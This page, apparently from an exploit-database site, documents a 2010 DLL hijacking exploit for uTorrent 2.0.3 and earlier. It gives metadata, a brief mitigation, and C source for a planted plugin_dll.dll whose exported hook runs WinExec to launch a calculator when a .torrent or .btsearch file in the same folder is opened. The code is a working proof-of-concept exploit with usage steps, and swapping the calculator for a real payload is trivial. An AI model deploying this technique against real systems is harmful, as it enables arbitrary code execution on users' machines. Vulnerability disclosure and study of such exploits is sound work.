uTorrent - exploit.company

vendor:

uTorrent

by:

TheLeader

7,5

CVSS

HIGH

DLL Hijacking

427

CWE

Product Name: uTorrent

Affected Version From: 2.0.3 and prior

Affected Version To: 2.0.3 and prior

Patch Exists: NO

Related CWE: N/A

CPE: a:utorrent:utorrent

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x86 (6.1.7600)

2010

uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)

Compile and rename to plugin_dll.dll, create a file in the same dir with one of the following extensions: .torrent / .btsearch. Double click & watch a nice calculator pop =]

Mitigation:

Ensure that all DLLs are digitally signed and that the signature is verified before loading the DLL.

Source

Exploit-DB raw data:

/*
Exploit Title: uTorrent <= 2.0.3 DLL Hijacking Exploit (plugin_dll.dll)
Date: 24/08/2010
Author: TheLeader
Email: gsog2009 [a7] hotmail [d0t] com
Software Link: http://www.utorrent.com/downloads
Version: 2.0.3 and prior
Tested on: Windows 7 x86 (6.1.7600)

Compile and rename to plugin_dll.dll, create a file in the same dir with one of the following extensions:
.torrent / .btsearch

Double click & watch a nice calculator pop =]

A nice post about DLL Hijacking by Yam Mesicka (hebrew):
http://www.mesicka.com/dll-hijacking-windows-hd-moore/

@avivra: glad to provide entertainment for you guys =D

*Even more shouts* to all the great guys at forums.hacking.org.il
*/

#include <windows.h>
#define DLLIMPORT __declspec (dllexport)

DLLIMPORT void hook_startup() { evil(); }

int evil()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}